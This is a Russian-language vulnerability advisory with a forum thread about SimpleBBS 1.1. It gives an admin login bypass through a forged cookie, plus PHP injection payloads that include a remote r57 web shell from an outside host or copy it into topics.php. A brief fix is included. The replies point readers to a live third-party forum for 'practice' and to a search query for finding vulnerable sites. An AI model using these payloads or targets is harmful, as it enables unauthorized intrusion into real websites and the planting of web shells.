Продукт: SimpleBBS 1.1
Уязвимость: Выполнение произвольного PHP-кода
Опасность: Критическая

Описание
Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS.
В параметре "Title font" в панели администратора можно ввести php-код в виде:
phpinfo();die;/*
который будет выполнен при прямом обращении к скрипту data/options.php
Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей.
Для получения шелла потребуется код:
include($_GET[c]);die;/*
Обращаться - data/options.php?c=http://www.site.com/r57shell.txt
или
copy($_GET[a],$_GET[ b]);die;/*
Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php.

Защита
Предлагается фильтровать параметр ylarivifont следующим кодом.
includes/adminjee3.php
Было:
$tallennus = fopen("data/options.php", "w");
flock ($tallennus,2);
fwrite($tallennus, "<?php
// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
$ylarivifont

Заменить на:
$tallennus = fopen("data/options.php", "w");
flock ($tallennus,2);
$ylarivifont = htmlspecialchars($ylarivifont);
fwrite($tallennus, "<?php
// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
$ylarivifont


Author: Great

Гугл выдал - SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to ...
если есть пароль к админке на бюлетене, это будет работать? или может, ЭТО, другие вкусности на бюлетене позволяет?

С НОВЫМ 2007! =)

Пароль к админке не нужен. Я описал две баги - вход в админку без пароля и выполнение в админке произвольного кода.
если есть пасс, первая бага не нужна. сразу заходи в админку

del

Вот тут мона потренировацца
http://asukkaat.hoas.fi/tukkitie/forum/index.php

_http://www.google.ru/search?q=%22Powered+by+SimpleBBS+v1.1%22

зашел на офф сайт
Simplemedia.org is currently down.

It will be back when SimpleBBS v1.2 is ready for open beta stage.
.....